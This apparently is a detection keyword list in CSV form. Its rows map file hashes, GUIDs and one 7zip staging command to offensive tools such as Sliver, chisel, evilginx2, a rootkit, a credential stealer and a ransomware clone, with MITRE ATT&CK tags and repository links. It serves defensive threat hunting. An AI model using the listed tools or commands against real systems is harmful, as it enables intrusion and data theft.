"*6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45*",".{0,1000}6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04*",".{0,1000}6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190*",".{0,1000}6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029*",".{0,1000}6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea*",".{0,1000}6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*",".{0,1000}6F99CB40\-8FEF\-4B63\-A35D\-9CEEC71F7B5F.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - 
T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85*",".{0,1000}6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4*",".{0,1000}6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736*",".{0,1000}6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44*",".{0,1000}6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and 
make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD*",".{0,1000}6FF9974C\-B3C6\-4EEA\-8472\-22BE6BD6F5CD.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0*",".{0,1000}6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7.exe a -mx3 ad.7z ad_*.txt*",".{0,1000}7\.exe\sa\s\-mx3\sad\.7z\sad_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. 
attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977*",".{0,1000}7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7*",".{0,1000}70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563*",".{0,1000}704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18*",".{0,1000}704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*70527328-DCEC-4BA7-9958-B5BC3E48CE99*",".{0,1000}70527328\-DCEC\-4BA7\-9958\-B5BC3E48CE99.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17*",".{0,1000}7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*70795D10-8ADF-4A4D-A584-9AB1BBF40D4B*",".{0,1000}70795D10\-8ADF\-4A4D\-A584\-9AB1BBF40D4B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7*",".{0,1000}70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*70BCFFDB-AE25-4BEA-BF0E-09DF06B7DBC4*",".{0,1000}70BCFFDB\-AE25\-4BEA\-BF0E\-09DF06B7DBC4.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" 
"*70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6*",".{0,1000}70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5*",".{0,1000}70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36*",".{0,1000}70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6*",".{0,1000}70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6*",".{0,1000}70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6*",".{0,1000}70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4*",".{0,1000}7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b*",".{0,1000}7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78*",".{0,1000}71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections 
live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3*",".{0,1000}7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1*",".{0,1000}7116f92ef4bdbb61fe15e5158197c984bd61ea944d95a854f30e58b19db43dc1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*713724C3-2367-49FA-B03F-AB4B336FB405*",".{0,1000}713724C3\-2367\-49FA\-B03F\-AB4B336FB405.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" 
"*7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd*",".{0,1000}7148724805f706f8da206b24e03f2f6381bb9bc6959bbf51b6414ea8903caddd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54*",".{0,1000}716066f05bcc12159c8f0d16846f924b928c75cbae2eb36f9b96b2d8f770cb54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a*",".{0,1000}7187c30cc73eeed90f61f91911272ae2868636667dfb30862b54aafb4164794a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951*",".{0,1000}71f693cce010e95145ada158a6ec7e7b1b9902f222dc53d9d54bee4d75031951.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb*",".{0,1000}72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac*",".{0,1000}723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809*",".{0,1000}724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e*",".{0,1000}7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a*",".{0,1000}726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" 
"*72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede*",".{0,1000}72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330*",".{0,1000}729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813*",".{0,1000}72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
